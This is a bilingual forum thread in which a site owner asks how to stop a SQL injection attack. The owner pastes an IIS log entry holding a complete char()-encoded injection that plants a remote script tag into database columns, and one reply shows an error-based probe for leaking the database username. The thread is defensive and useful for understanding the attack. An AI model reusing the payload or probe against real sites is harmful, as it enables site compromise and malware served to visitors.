对使用 SQL Server 数据库的 ASP 站点的攻击
我们有一个调查网站显然遭到了攻击。这些症状与本网站下一页所描述的相同: 针对 ASP.NET 网站的 XSS 攻击。
我在 IIS 日志中发现了多个包含恶意代码的条目:
< /标题> <脚本 src = http://google-stats49.info/ur.php>。
以下是 IIS 日志条目之一的 cs-uri-query 字段值的示例。
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) %2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112) %2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112) %2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45) %2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110) %2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62) %2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar( 8000)),cast(char(32)+as+varchar(8)))--
我不明白上面的代码是如何工作的,但显然这是在查询字符串中发送到数据库表中损坏的列的内容。我们暂时关闭了我们的网站。我们可以从数据库中删除脚本,但这并不能防止当我们使站点重新上线时它再次被损坏。
有人对如何防止这种情况发生有任何建议吗?
We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site:
XSS Attack on the ASP.NET Website.
I found multiple entries in our IIS logs that included the malicious code:
< / title> < script src = http : // google-stats49.info/ur.php >.
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
Does anyone have any suggestions on how to prevent this from happening?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(6)
这就是 SQL 注入。
有关此主题的内容有很多:Google 是你的朋友
That's a SQL injection.
There is tons on this subject: Google is your friend
另外...
Also...
不确定这是否仍然与您相关,但我过去曾发生过这种情况,因为我们仍然运行一些旧的 asp 网站。您需要做两件事来清理它。首先是数据库的查找和替换存储过程(很容易通过 Google 搜索),如果您可以的话。不幸的是,有时数据会根据字段类型被截断,但这里无能为力。否则,需要回滚您的数据库。
其次是在数据库连接之前插入一个 SQL 注入黑客防护脚本,如下所示:
祝你好运。
Not sure if this is still relevant for you, but I have had this happen in the past as we still run some old asp sites. There are two things you need to clean this up. First is a find and replace stored procedure for your database (easy enough to Google this), if you can get away with it. Unfortunately sometimes the data is cut off depending on the field type, but there is nothing to do here. Otherwise a roll back for your db is necessary.
Second is insert a SQL injection hack prevention script like this as an include before your database connection:
Good luck.
将 IIS 配置为发送自定义错误页面或默认错误 500 页面,而不是向客户端发送详细的错误消息。
详细的错误消息已用于查找数据库模式。然后他们使用 SQL 注入来更新文本字段。
这是获取数据库用户的示例:
即“and ^+user+^=0”,它返回:
其中“myDbUsername”是您的真实数据库用户。
使用类似的技术,可以一一获取数据库、表、列、类型等。
如果您尚未受到攻击,请禁用 IIS 中的详细错误,否则请检查日志以查找哪些页面存在 SQL 注入漏洞并进行更正。
我编写了一个小脚本来检查我的数据库中是否有“
我使用的是 IIS 7、Win Server 2008 和 SQL Server 2008,因此这次攻击似乎没有使用任何 SQL Server 2003 / 2005 漏洞网上很多文章都有提到。
Configure your IIS to send a custom error page or the default error 500 page instead of sending detailed error messages to the client.
Detailed error messages has been used to find the db schema. Then they used sql injection to update text fields.
Here's an example to get the DB user:
that is "and ^+user+^=0" and it returns:
where "myDbUsername" is your real database user.
Using a similar tecnique it is possible to get databases, tables, columns, types etc. one by one.
If you have not been already attacked then disable detailed errors in IIS, otherwise check your logs to find which pages have sql injection vulnerabilities and correct them.
I wrote a small script to check if there are "<script" in my database:
I'm on IIS 7, Win Server 2008 and SQL Server 2008 so it doesn't seems this attack uses any SQL Server 2003 / 2005 vulnerabilities as stated in many articles on the web.
您受到了 LizaMoon 自动 SQL 注入漏洞包的攻击,现在在该公司页面上的一篇文章中提到了该公司,该公司被认为是最先记录该攻击的:http://community.websense.com/blogs/securitylabs/archive/2011/03/ 31/update-on-lizamoon-mass-injection.aspx
You are being hit by the LizaMoon automated SQL injection exploit pack, and are now mentioned in an artice on the page of the company that is credited with first documenting the attack: http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
BulletProof Security WordPress 插件具有 SQL 注入过滤器,可以在 htaccess 文件中阻止此攻击。由于您有一个 IIS 服务器,因此您需要添加其他功能来使用 htaccess 文件,或者您可以以其他方式将 SQL 注入过滤器与 IIS 合并,因为 htaccess 传统上是 Apache 的东西。这是 BulletProof Security 主 htaccess 文件中阻止所有 SQL 注入黑客尝试的行:
The BulletProof Security WordPress plugin has the SQL Injection filters that will block this attack in an htaccess file. Since you have an IIS server you would need to add additional features that would enable you to use an htaccess file or maybe you could incorporate the SQL Injection filters in some other way with IIS since htaccess is traditionally an Apache thing. This is the line in the BulletProof Security master htaccess file that blocks ALL SQL Injection hacking attempts: